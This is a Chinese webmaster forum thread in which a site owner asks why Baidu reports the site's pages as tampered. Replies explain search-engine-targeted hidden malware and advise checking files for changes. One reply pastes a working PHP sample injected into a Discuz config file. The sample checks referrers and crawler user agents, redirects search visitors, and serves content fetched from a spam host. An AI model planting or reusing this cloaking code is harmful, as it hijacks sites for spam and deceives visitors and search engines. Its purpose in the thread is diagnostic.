急，帮忙看看，是域名劫持还是什么原因，百度显示页面被篡改

jmxye · 发表于 2018-8-21 08:48:26

急，帮忙看看，是域名劫持还是什么原因，百度显示页面被篡改
之前是直接解析到我服务器的，现在换到百度云上了，还是显示页面被篡改，站长工具搜索出来的页面也是被篡改了，但打开网站显示正常，不知道问题出在哪里
www.wode021.com

⑧穿内裤 · 发表于 2018-8-21 08:52:16

被挂马了吧

mR.耗子 · 发表于 2018-8-21 08:58:20

被挂木马了~
搜索引擎被劫持了~~
可以联系我的QQ交谈为您处理清理木马有偿服务！！

xiaoyuwxz · 发表于 2018-8-21 08:58:45

不是域名问题，是网站被入侵，改写了文件了。

jmxye · 发表于 2018-8-21 08:58:45

但我打开网站显示正常的啊，而且服务器上也没看到有马

⑧穿内裤 · 发表于 2018-8-21 08:59:41

jmxye 发表于 2018-8-21 08:58
但我打开网站显示正常的啊，而且服务器上也没看到有马

定向的，有来路检查，针对搜索引擎的木马，凡是从搜索引擎进入就会跳转

jmxye · 发表于 2018-8-21 09:04:47

⑧穿内裤发表于 2018-8-21 08:59
定向的，有来路检查，针对搜索引擎的木马，凡是从搜索引擎进入就会跳转

那这个怎么弄啊，

hhb121 · 发表于 2018-8-21 09:27:34

手头有一份以前客户的挂马文件例子，效果是一致的，客户端打开当然正常，因为是针对搜索引擎的挂马。

看这里是没作用于百度的，如果是百度来路就不会篡改，而你那个更直接百度也一并修改了。这里是修改的dz的配置文件config，其实原理都一样。

set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://垃圾转向/');
define('s_s', '@haosou.com|360Spider|HaosouSpider|so.com@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_content
s($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header('Location: http://垃圾转向/');exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
$_config = array();

复制代码

解决办法，就是做好服务器安全，做好网站程序安全。

⑧穿内裤 · 发表于 2018-8-21 09:54:02

jmxye 发表于 2018-8-21 09:04
那这个怎么弄啊，

后台，工具，文件校验，把被修改的排查下

jmxye · 发表于 2018-8-21 11:16:56

hhb121 发表于 2018-8-21 09:27
手头有一份以前客户的挂马文件例子，效果是一致的，客户端打开当然正常，因为是针对搜索引擎的挂马。

看 ...

我看了配置文件里没有动过，在服务器上发现木马，木马已经被删除了，但找不到是哪个文件被改的

		自动登录	找回密码
密码			立即注册

[求助] 急，帮忙看看，是域名劫持还是什么原因，百度显示页面被篡改